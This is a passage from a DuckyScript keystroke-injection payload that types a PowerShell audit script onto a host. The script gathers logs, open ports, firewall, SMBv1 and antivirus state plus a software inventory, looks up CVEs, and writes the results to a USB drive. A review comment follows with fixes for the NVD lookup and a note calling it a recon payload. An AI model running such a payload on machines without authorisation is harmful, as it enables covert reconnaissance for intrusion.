|
||||||
|
STRING if ($_.Exception -match '403') {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds 60
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $retryResponse = invoke-restmethod -uri $uri -method get
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($retryResponse.totalresults -gt 0) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($cve in $retryResponse.result.cve_items) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "no cves found for $productname $version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function analyze-logs {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-eventlog -logname system -newest 100
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error analyzing logs: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-openports {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING netstat -an
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking open ports: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-missingupdates {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Checking Windows Update logs..."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "WindowsUpdate.log written to $updateLogPath"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error getting Windows Update log: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-firewallstatus {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING netsh advfirewall show allprofiles
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking firewall status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-smbv1status {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-windowsoptionalfeature -online -featurename smb1protocol
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking SMBv1 status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-antivirusstatus {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-mpcomputerstatus
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking antivirus status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-passwordpolicy >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING audit-services >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-networksettings >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-softwarevulnerabilities >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING analyze-logs >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-openports >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-missingupdates >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-firewallstatus >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-smbv1status >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-antivirusstatus >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Dynamically identify critical software from running processes and scheduled tasks
|
||||||
|
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Combine running software and scheduled tasks
|
||||||
|
STRING $softwareList = @()
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($process in $runningSoftware) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $softwareList += $process.Name
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($task in $scheduledTasks) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Remove duplicates and empty entries
|
||||||
|
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Check CVEs for identified software
|
||||||
|
STRING foreach ($software in $softwareList) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($version) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-cve -productname $software -version $version >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds $initialDelay
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Results saved to USB drive."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error: USB drive MYUSB not found."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING invoke-command -scriptblock $script
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 20000
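Review bot: `check-cve` (L2018–L2530) queries `https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=…`, an endpoint NVD has retired in favour of the 2.0 API, so every lookup lands in the `catch` and `results.txt` only records `Error checking CVEs`; the product name and version are also interpolated into the URL unescaped, so any name containing a space or `&` produces a malformed query. A related scoping bug: `$initialDelay` is assigned inside the function (L2098), while the loop at L3682 increments a separate script-level `$initialDelay` by 5–10 s on every iteration and then sleeps on it, so the per-package wait grows linearly and a host with a few hundred processes spends hours in `start-sleep`. `invoke-command -scriptblock $script` (L3810) references a `$script` that is never assigned — the `if ($usbDrive) {…}` block already executed when its closing brace was entered at L3794 — so the line only yields a null-argument binding error and should be dropped. The excerpt below switches the lookup to the 2.0 endpoint with an escaped `keywordSearch`, reads `vulnerabilities[].cve.id` and `descriptions`, and uses a fixed per-iteration jitter; the same field names apply to the `$retryResponse` branch. Consider also that this sends the audited host's full process and installed-software inventory to a third-party API from the target itself; for a recon payload, writing the inventory to `results.txt` and resolving CVEs offline from the analyst's machine avoids that disclosure and the rate limiting the `403` branch works around.
```duckyscript
REM … unchanged: check-cve param block …
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch=$([uri]::EscapeDataString("$productname $version"))"
ENTER
DELAY 200
REM … unchanged: start-sleep, invoke-restmethod, totalresults check …
STRING foreach ($cve in $response.vulnerabilities) {
ENTER
DELAY 200
STRING "$($cve.cve.id) - $(($cve.cve.descriptions | Where-Object { $_.lang -eq 'en' } | Select-Object -First 1).value)"
ENTER
DELAY 200
REM … unchanged: else branch, catch/403 retry (apply the same field names there), remaining functions …
REM … unchanged: software inventory loop up to the check-cve call …
STRING start-sleep -seconds (Get-Random -Minimum 5 -Maximum 10)
ENTER
DELAY 200
REM … unchanged: closing braces and "Results saved" message; the invoke-command line is removed …
```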
|